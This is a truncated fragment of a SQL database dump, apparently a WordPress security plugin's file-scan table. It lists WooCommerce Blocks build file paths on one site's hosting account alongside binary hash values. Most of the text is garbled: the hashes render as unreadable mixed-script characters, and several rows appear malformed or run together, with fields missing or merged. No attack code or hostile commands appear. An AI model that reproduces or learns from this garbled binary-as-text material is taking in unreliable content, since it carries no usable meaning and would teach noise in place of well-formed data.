%n0','CYDvKq/<)nyh&Z\0u\'\"','',0,'?'),('c[l iIj?','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oZR _',' ƥ [lvi5+< ','',0,'?'),('Bapy','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9T\\G-V','AM)I0o6&lv톀ټJg','',0,'?'),('De5H?кg)+G','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ps|~Hj2X','Vf1Q-l 9b :T</<','',0,'?'),('','ouVuVEx Ha +','',0,'?'),('pwSo_95','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qG Ӂ ZQ','k΀]&_SՔƓH-','',0,'?'),('f6NӚ u\n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JU,b ^GЀ','o0Փ>l#~˙N{U:p','',0,'?'),('uh,cSsIA7','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2#dp)f=','Jy]-:Ef7CV8m=WB˚n/','',0,'?'),('ǟ~x2gu','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yi+:#d ','\ZRh\0n1h;\\y-o\r','',0,'?'),(' PFxx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w\0k4.0}','%;bԍD-~Bdx%!KZF6i','',0,'?'),('Wi4Tx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/filter-wrapper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԉ)]0h3','@RE.:: }>MVR','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-accepted-payment-methods-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-accepted-payment-methods-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 90wS#',':V4U$a_.\\O\'[,= ','',0,'?'),('sDE`2$@','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-cross-sells-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-cross-sells-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+C',' df\n_QnKqPceb)6?','',0,'?'),('\Z byLnգ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-cross-sells-products-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-cross-sells-products-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F\0\"}H%','@)<1Cldcq?BV]','',0,'?'),(' #x!?yp&B','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-express-payment-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-express-payment-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#ܚl,-1','k٥h󓍾~;-7c.n','',0,'?'),('~ORŊ(\"B','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-items-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-items-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vnGT$ɉ','e Ժfo?Z ? ','',0,'?'),('u\rD.Yl','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-line-items-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-line-items-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a\Z+-?','euN7t\'O.\nz1nT|/\'','',0,'?'),('\nކHh $','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-order-summary-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%pl6ffO[?.','Re|Oe|Le;<u','',0,'?'),('s,jMM\\%ZV','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-totals-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/cart-totals-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+!2\ZӇ~JZ',':sҵ0h5~R\'1O^x{N','',0,'?'),('FeO9%','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-actions-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-actions-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WRq8 /\\K)','2%RA_=EN\n߃֕Ϗ C','',0,'?'),(' K_1 5)d','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-billing-address-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-billing-address-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2J`‹qr','tzĵ\rD\na2a{','',0,'?'),('b)\'ri\n;*','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' F7Ԇ','l>ͳB˚J$\rpR`Cr- Uc\r|','',0,'?'),('J>dJ\"آ}\Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-cart-items-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-cart-items-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NXyEJ7','fѫ4>͹UORt[9l','',0,'?'),('0\n12#\\#\"j','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-coupon-form-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-coupon-form-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!\n8o','zy-UH\\˄,9yÒBn','',0,'?'),('P Rf(tߞ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-discount-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-discount-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UԡK% \"','3}IE`,^(j%1H#','',0,'?'),('&܍SI\Z!','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-fee-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-fee-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!+2TAd~I','0F+Gk;lFM/MWdZmC','',0,'?'),('#ҹZr仝f','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-shipping-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-shipping-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q SO&Lt0','BMql(aK~[O_%`7eWA','',0,'?'),('lZ}巿N,','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-subtotal-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-subtotal-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ʪ[Ϋ!2L1','T3v|\\M#9:.+\n%zʔid','',0,'?'),('ީWpզCS>6\\','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-taxes-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-order-summary-taxes-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\Znn7 n>','aں\nE Iе?TVZQ)','',0,'?'),('6ˏ ]G*','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-payment-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-payment-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{`y&!>Y','):C\Zgj \\w@U@5V&','',0,'?'),('#qWm/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-pickup-options-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-pickup-options-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','daeU\\H?g','k\\n\rY!aӐ~<','',0,'?'),('ʺT{x?FNa','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-address-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-address-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e,ew nD)C','>YЈQq@y)AE8k','',0,'?'),('\0{% v','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-method-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-method-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T(*','V;5 ܰI\Z15is޶m3','',0,'?'),(' zahb|ĕ\ZxU','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-methods-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-shipping-methods-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rw~†_$B%','m\Zd/c-rͰŔ:l','',0,'?'),('O y#5\0ɚI','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-terms-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-terms-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r Y^?Ou','|b1k=ǶH̛ͷ`(Ml/w','',0,'?'),('\Zmg@&-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-totals-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/checkout-totals-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٟ\r\\>#,a','a94\n%^$20xGE~>ٮ','',0,'?'),('sˉIݡgAU','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/empty-cart-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/empty-cart-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4rb~mל','!tti߾.zޡ _(QA','',0,'?'),('yGwkNE @','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/empty-mini-cart-contents-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/empty-mini-cart-contents-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5YJ\Z ;','\n }~pp`mD;8]g tiB\0D','',0,'?'),('ЃV1\\p#','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/filled-cart-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/filled-cart-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߂]p7Q^6@*\Zu','R*IF!{W׮RQ\06','',0,'?'),('}c;\\\"K','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/filled-mini-cart-contents-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/filled-mini-cart-contents-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o3\'bxX/','‚~(3raBZV( 3','',0,'?'),(']\0WX','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-cart-button-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-cart-button-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V2s|Iχ','?ȟĈm  6 ⒵','',0,'?'),('Ӂ5Dlf>9E','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-checkout-button-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-checkout-button-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{h͔B6F~','d6Vuhi\nJiV ~i\0+ #','',0,'?'),('9(}$\0`wl`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-footer-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-footer-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ބHڸ\r< ','?^P\' od_Gp','',0,'?'),('/\"By`?','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-items-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-items-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3qy#+\n8VJ','. yj(KuU[EeIw2','',0,'?'),('M[5Ec\r_m','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-products-table-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-products-table-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\03#1=F','s\0)9.̞bBT~\"Y','',0,'?'),('li ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-shopping-button-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-shopping-button-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M/_zZiG','\"}kE$xb87%*AL','',0,'?'),('@_5}','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N 쯨MC}6','|u^Lz{jݶwJ','',0,'?'),('p|HYgBd','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-items-counter-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-items-counter-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6^ԶƨcG/BY','fw`3[@@:x͍+h N','',0,'?'),('ޅZLyTʑ{,','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-label-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/mini-cart-title-label-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jqQ\"u','6(MoJ=T_j& ','',0,'?'),(' kt\0*KN','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/proceed-to-checkout-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/inner-blocks/proceed-to-checkout-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(T\06','MoM/[]]0ŲƜh','',0,'?'),(' hh\r ˁ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|TxfҊ^sxix,','{׍u9 HV8{+0\Z\r','',0,'?'),('EY,\\-֎','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2|6CQ/l \0','WU吐3&{䏬8T{ \r','',0,'?'),('v)!:y5','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' YC~r)@','|O9Bz.iŤ.is:V;z','',0,'?'),('W\'qf-.]<','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sΗOb','~W|d\\ 0́/II\0.Q+1E?m','',0,'?'),('H0cu7','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/legacy-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0W/[F-','a* +nv}ԉ(l','',0,'?'),('ߦMƛaŔo4u','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.j-8DS','`O\"ʁ%ߪtigT1','',0,'?'),('! ċ\n=.#N','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-component-frontend.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-component-frontend.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q¸.t','i]^;eCۡ@qgE','',0,'?'),('̌34ҿ{z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-component-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-component-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<6Fb=_cn','Yj~V]ouxPtM1@A/39`','',0,'?'),('XDG\Ztn+kF','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button--mini-cart-contents-block/checkout-button--mini-cart-contents---358acf4e-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button--mini-cart-contents-block/checkout-button--mini-cart-contents---358acf4e-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':[T46E\\ف','BҴ\\}`{ganA9Zݻ s\Zra','',0,'?'),('o_\0W`=AWwK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y\0~`H4','z$}*\'f.\"a铒Ok!T','',0,'?'),('D? umJ^','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/cart-button-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#5S-','Bzu.v}WHzA1<*','',0,'?'),('T {i4-A:D','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/checkout-button-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/checkout-button-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o9?Lst','ifNŶŒ_fKpU=v裪]','',0,'?'),('D ڙhfAz{b','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/checkout-button-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/checkout-button-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\n6n','(96_]cDYsߙu4','',0,'?'),(':\'-&3T','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/empty-cart-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/empty-cart-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>l#2ڒ82<','G#8ptu jk)E',' \rO3~(0țŤO','',0,'?'),('ul\raEB\"ZBf','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/filled-cart-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/filled-cart-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z!*a>','\'\'\rnqBTŞ2Dܤ3o','',0,'?'),('\nMpuo{','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/filled-cart-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/filled-cart-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uߏg@uJWG','5P9y͎x=OQ~.=ϳ4T','',0,'?'),('䬎ejS','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pNK?','t >z,.4PNNՎ 0','',0,'?'),('LedƱ#`̲','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ِK#!54','I1|t\Z3 `SJ,LXG2','',0,'?'),('y7Y-ےT','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r`KD70~','|,Lֵ3WtO/u\'+L|/','',0,'?'),('wԻKLA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/footer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Am+vM\Zb_J',') \n3\'-olbmxHVKZ','',0,'?'),('oD(;Q','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/items-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/items-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*yW74','}#z)ee)7.^','',0,'?'),('q\rg9\'\\@\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/items-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/items-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dq;M Sf','`jAzR xN97b݈ivA','',0,'?'),('6p%o wus','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table--product-image--product-title-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table--product-image--product-title-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TV|檡G','-;Eo~-\r[j$\0S','',0,'?'),('A1W@{`L\0[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')y1L\"+','$b2i9bdy>\':ۊ','',0,'?'),('֢Y/J\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7h`By','bbZ ƥ1}59;Xjq^ T( \r','',0,'?'),('C2]lzbx_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X2}0','ϢZ)ک-:e4\ZLd>C7a\Z','',0,'?'),('F0mטWz','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/products-table.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eCO\\6{2','ƥ3Θ@䌹pcRvDV','',0,'?'),('F^ad{?gM','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/mini-cart-contents-block/shopping-button-frontend.js','/home/tummmyov/tummyrevolution.com/